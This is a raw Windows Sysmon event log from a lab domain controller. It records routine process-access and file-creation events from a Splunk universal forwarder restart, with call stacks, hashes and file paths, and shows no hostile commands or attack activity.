13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E5-5FCF-0701-000000009101}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.654{10ACEC4A-8551-5FCF-3300-000000009101}30802840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85E5-5FCF-0701-000000009101}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.662{10ACEC4A-85E5-5FCF-0701-000000009101}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=3080C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.623{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2020-12-08 13:55:49.623 11241100x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.623{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2020-12-08 13:55:49.623 11241100x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.623{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2020-12-08 13:55:49.623 11241100x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:55:49.498{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2020-12-08 13:55:49.498 11241100x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.482{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2020-12-08 13:55:49.482 11241100x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.467{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2020-12-08 13:55:49.467 11241100x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.467{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2020-12-08 13:55:49.467 11241100x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:49.467{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2020-12-08 13:55:49.467 11241100x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.467{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2020-12-08 13:55:49.467 11241100x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.467{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2020-12-08 13:55:49.467 11241100x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:55:49.467{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2020-12-08 13:55:49.467 10341000x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.529{10ACEC4A-85E6-5FCF-1101-000000009101}43805044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E6-5FCF-1101-000000009101}4380C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85E6-5FCF-1101-000000009101}4380C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-85E6-5FCF-1001-000000009101}43362756C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E6-5FCF-1101-000000009101}4380C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.276{10ACEC4A-85E6-5FCF-1101-000000009101}4380C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E6-5FCF-1001-000000009101}4336C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:50.263{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85E6-5FCF-1001-000000009101}4336C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 